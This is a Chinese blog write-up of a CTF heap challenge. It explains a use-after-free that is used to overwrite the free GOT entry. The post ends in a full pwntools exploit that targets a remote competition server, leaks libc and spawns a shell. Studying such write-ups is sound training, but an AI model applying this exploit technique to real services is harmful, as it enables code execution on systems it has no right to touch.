[冀信2021-pwn] vip

最新推荐文章于 2023-06-20 13:17:34 发布
最新推荐文章于 2023-06-20 13:17:34 发布
阅读量449 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121952696
版权

比赛只有两小时,不会出难题,但也耗了不少时间。

从界面上很容易确定是个堆题

关注几点:

  • PIE未开且got表可写
  • 有管理块,管理块里有指向数据块的指针
  • free里没有删指针有UAF
  • 有edit可以随时写
  • 没有show

思路就是利用这个指向数据块的指针,先把它指向got[free],再把got[free]改为puts实现回显,在得到libc后改为system

处理步骤:

  • 建0x80,0x20
  • free(0) 这时指针并没有擦除,还可以用来修改
  • 再建0x20 这里会将管理块建到原0数据块的位置,可以通过0来修改它的指针
  • 通过2修改0的指针指向got[free],再通过0修改got[free]这plt[puts],调free即可得到堆地块
  • 再将通过2修改0的指针指向剩余的unsort的fp指针,调free得到libc
  • 重复上步,再通过2修改0指向got[free]将其改为system
  • 建个/bin/sh的块然后释放
from pwn import *

local = 0
if local == 1:
    p = process('./vip')
    libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
else:
    p = remote('82.157.18.9', 55603) 
    libc_elf = ELF('./libc-2.23.so')

elf = ELF('./vip')
context.arch = 'amd64'

menu = b"Your Choice:\n"
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Input Your Password Size:\n", str(size).encode())
    p.sendafter(b"Input Your Password:\n", msg)

def edit(idx, msg):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Input Your ID:\n", str(idx).encode())
    p.sendafter(b"Input Your New Password:\n", msg)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Input Your ID:\n", str(idx).encode())

add(0x80, b'A')
add(0x20, b'A')
free(0)
add(0x20, b'A')
context.log_level = 'debug'

edit(2, p64(elf.got['free']))
edit(0, p64(elf.plt['puts']))
free(1)
p.recvline()
heap  = u64(p.recvline()[:-1].ljust(8, b'\x00')) -0xd0

edit(2, p64(heap + 0x40))
free(0)
libc_base  = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x58 - 0x10 - libc_elf.sym['__malloc_hook']
system     = libc_base + libc_elf.sym['system']
print(hex(libc_base))

edit(2, p64(elf.got['free']))
edit(0, p64(system))

add(0x30, b'/bin/sh')
free(3)

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2417
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 789
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
[冀信2021-pwn] pwn19
weixin_52640415的博客
12-15 2565
这是一个简单的printf+溢出题,可以输入2次6位的串用来printf,然后输入串溢出。 int __cdecl main(int argc, const char **argv, const char **envp) { int v5; // [rsp+Ch] [rbp-34h] __int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF unsigned __int64 v7; // [rsp+38h] [rbp-8h] v7 = __readfsq
[冀信2021-crypto] ez-crypto
weixin_52640415的博客
12-17 449
昨晚上终于作出来了,回头一想也不难。把思路整理清楚了就好办了。 传附后也麻烦,直接上原题吧 import random import os from Crypto.Cipher import DES from Crypto.Util.number import * def encode(m,k): s=[] for i in m: s.append(sbox[i]) s=s[3:]+s[0:3] asse
[冀信2021]Run_it_36_times的附件
amber_o0k的博客
12-16 614
pyc隐写 去github下载打包好的,可以在linux下作为命令直接执行
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 400
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
湖湘杯2021-pwn-final部分复现
qq_53062301的博客
12-09 4913
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘杯是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
CTFshow-pwn入门-前置基础pwn26-pwn28
T1ngSh0w的博客
06-20 951
CTFshow-pwn入门-pwn26-pwn28
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
从出口数据看中国经济新动能-华福证券.pdf
07-21
从出口数据看中国经济新动能-华福证券
java毕设&课设-ASP玩具交换网站设计与实现(源代码+论文).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
人工智能行业深度报告:WAIC2024,国产AI+应用“百花齐放”
07-21
2024年世界人工智能大会(WAIC 2024)上,国产AI+应用生态呈现“百花齐放”的局面 1. WAIC 2024:国产 AI+应用生态“百花齐放” 多家厂商携大模型及AI应用成果亮相展会,涵盖金山办公、科大讯飞、华为、商汤等知名企业。 OpenAI 禁令加速推动国产 AI 生态,国产大模型性能持续提升,缩小与海外差距。 预计未来国产 AI+行业应用将迎来“百花齐放”局面,商业空间加速打开。 2. 国产大模型加速迭代,代表性厂商生态加速构建 科大讯飞 发布星火 V4.0 大模型,全面对标 GPT-4 Turbo,多模态能力显著提升。 星火医疗和教育垂类模型能力升级,赋能行业应用落地。 推出星火企业智能平台,赋能企业构建岗位专属助手。 华为 发布盘古大模型 5.0 系列,包括不同参数规模,适用于多种场景。 推出盘古具身智能大模型,推动人形机器人技术升级。 盘古 5.0 赋能华为小艺升级,在多个行业落地应用。 商汤 发布“日日新 5.5”模型,交互体验对标 GPT-4o,多模态能力实现突破。 推出面向 C 端用户的可控人物视频生成模型 Vimi。 率先实现原生多模态大模型车端部署
HDTF-DATA.z09
最新发布
07-21
HDTF-DATA.z09
2023肠道产业发展白皮书-热心肠研究院.pdf
07-21
2023肠道产业发展白皮书-热心肠研究院
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值